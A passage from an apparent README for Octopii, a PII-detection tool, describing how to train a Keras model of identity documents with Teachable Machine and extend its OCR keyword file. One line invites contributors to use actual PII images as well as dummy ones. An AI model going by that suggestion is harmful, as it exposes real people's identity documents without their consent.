file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python. - The labels.txt
file contains the list of labels corresponding to the index that the model returns. - The ocr_list.json
file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions etc.
Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy to use model generator called the Teachable Machine. To use it:
Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.
Note: Only upload the same as the class name, for example, the German Passport class must have German Passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.
keras_model.h5
file and labels.txt
file into the models/
directory in Octopii.The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII. Make sure they are square-ish in image size.
Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:
ocr_list.json
file. Create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
keywords
, use as many unique terms from your asset as possible, such as "Income Tax Department". Store them in a JSONArray.ocr_list.json
file.You can replace each file you modify in the models/
directory after you create or edit them via the above methods.
Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.
Note: Please take the following steps to ensure quality
ocr_list.json
.(c) Copyright 2022 RedHunt Labs Private Limited
Author: Owais Shaikh